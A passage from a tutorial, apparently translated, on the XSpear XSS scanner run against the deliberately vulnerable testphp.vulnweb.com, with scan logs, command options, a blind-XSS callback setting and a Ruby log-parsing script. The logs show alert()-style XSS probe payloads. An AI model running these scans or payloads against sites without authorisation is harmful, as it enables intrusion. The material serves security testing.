How to use XSpear for XSS scanning and parameter analysis

Source: 岁月联盟  Editor: 猪蛋儿  Date: 2020-01-29
Code]
    [V] [22:42:59] [200/OK] found alert/prompt/confirm (45) in selenium!! '">svg/onload=alert(45)>[param: cat][triggered ]
    ...
    you see report
【3】Show the detailed scan log
$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 3
    [*] analysis request..
    [-] [22:56:21] [200/OK] http://testphp.vulnweb.com/listproducts.php?cat=123 in url
    [ Request ]
    {"accept-encoding"=>["gzip;q=1.0,deflate;q=0.6,identity;q=0.3"], "accept"=>["*/*"], "user-agent"=>["Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"], "connection"=>["keep-alive"], "host"=>["testphp.vulnweb.com"]}
    [ Response ]
    {"server"=>["nginx/1.4.1"], "date"=>["Sun, 29 Dec 2019 13:53:23 GMT"], "content-type"=>["text/html"], "transfer-encoding"=>["chunked"], "connection"=>["keep-alive"], "x-powered-by"=>["PHP/5.3.10-1~lucid+2uwsgi2"]}
    [-] [22:56:21] [200/OK] 'STATIC' not reflected
    [-] [22:56:21] [200/OK] cat=123rEfe6 in url
    ...
    [*] used test-reflected-params mode(default)
    [*] creating a test query [for reflected 2 param + blind XSS ]
    [*] test query generation is complete. [249 query]
    [*] starting XSS Scanning. [10 threads]
    ...
    [ Request ]
    {"accept-encoding"=>["gzip;q=1.0,deflate;q=0.6,identity;q=0.3"], "accept"=>["*/*"], "user-agent"=>["Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"], "connection"=>["keep-alive"], "host"=>["testphp.vulnweb.com"]}
    [ Response ]
    {"server"=>["nginx/1.4.1"], "date"=>["Sun, 29 Dec 2019 13:54:36 GMT"], "content-type"=>["text/html"], "transfer-encoding"=>["chunked"], "connection"=>["keep-alive"], "x-powered-by"=>["PHP/5.3.10-1~lucid+2uwsgi2"]}
    [H] [22:57:33] [200/OK] reflected keygen autofocus onfocus=alert(45)>[param: cat][reflected onfocus XSS Code]
    ...
    you see report
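As an added example (my own code, not part of XSpear), the following Ruby script parses the verbose log shown above into structured findings and groups the confirmed ([V]) and high ([H]) results per parameter, which is what a pipeline consuming the console log needs instead of eyeballing it; the only tag meanings assumed are those visible on this page.

```ruby
# Added example, not XSpear's own code: turn XSpear's verbose scan log into
# structured findings. Only tags seen in the log above ([V], [H], [-]) are
# given a meaning; any other tag is kept verbatim in :tag.

# Shape of a timestamped log line, e.g.
#   [H] [22:57:33] [200/OK] reflected ...>[param: cat][reflected onfocus XSS Code]
LINE_RE  = /\A\s*\[(?<tag>[^\]]+)\]\s+\[(?<time>\d{2}:\d{2}:\d{2})\]\s+\[(?<status>[^\]]+)\]\s+(?<rest>.*)\z/
# Trailing "[param: NAME][NOTE]" suffix XSpear appends to a finding
PARAM_RE = /\[param:\s*(?<param>[^\]]+)\]\[(?<note>[^\]]*)\]\s*\z/

SEVERITY = { 'V' => :vulnerable, 'H' => :high, '-' => :negative }.freeze

Finding = Struct.new(:severity, :tag, :time, :status, :param, :note, :message, keyword_init: true)

# Returns a Finding, or nil for untimestamped "[*]" progress lines.
def parse_xspear_line(line)
  m = LINE_RE.match(line.chomp)
  return nil unless m
  rest = m[:rest]
  pm = PARAM_RE.match(rest)
  Finding.new(
    severity: SEVERITY.fetch(m[:tag], :unknown), tag: m[:tag],
    time: m[:time], status: m[:status],
    param: pm && pm[:param].strip, note: pm && pm[:note].strip,
    message: (pm ? rest[0...pm.begin(0)] : rest).strip
  )
end

def parse_xspear_log(text)
  text.each_line.map { |l| parse_xspear_line(l) }.compact
end

# Keep only [V]/[H] findings that name a parameter, grouped per parameter,
# with the strongest evidence (a Selenium-triggered [V]) first.
def triage(findings)
  findings.select { |f| %i[vulnerable high].include?(f.severity) && f.param }
          .group_by(&:param)
          .transform_values { |fs| fs.sort_by { |f| f.severity == :vulnerable ? 0 : 1 } }
end

# Constructed sample, built from the line formats shown in the log above.
SAMPLE_LOG = <<~LOG
  [*] analysis request..
  [-] [22:56:21] [200/OK] 'STATIC' not reflected
  [-] [22:56:21] [200/OK] cat=123rEfe6 in url
  [H] [22:57:33] [200/OK] reflected keygen autofocus onfocus=alert(45)>[param: cat][reflected onfocus XSS Code]
  [V] [22:42:59] [200/OK] found alert/prompt/confirm (45) in selenium!! '">svg/onload=alert(45)>[param: cat][triggered ]
LOG
```

Feed it the output of `xspear ... -v 3` to get one entry per affected parameter; `triage(parse_xspear_log(SAMPLE_LOG))` yields a single `cat` entry with the [V] finding ahead of the [H] one.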
Usage examples
Scan for XSS:
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"
Output only the JSON result:
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 0
Set the number of scan threads:
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30
Test only selected parameters:
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -p cat,test
Test all parameters:
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -a
Test for blind XSS:
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwul.xss.ht" -a
    # Set your blind xss host.
For pipeline use:
$ xspear -u {target} -b "your-blind-xss-host" -a -v 0 -o json
    # -u : target
    # -b : testing blind xss
    # -a : test all params (including params that are not reflected)
    # -v : verbose level, not showing logs at value 1.
    # -o : output options, json!
Result in JSON format:
{
        "starttime": "2019-12-25 00:02:58 +0900",
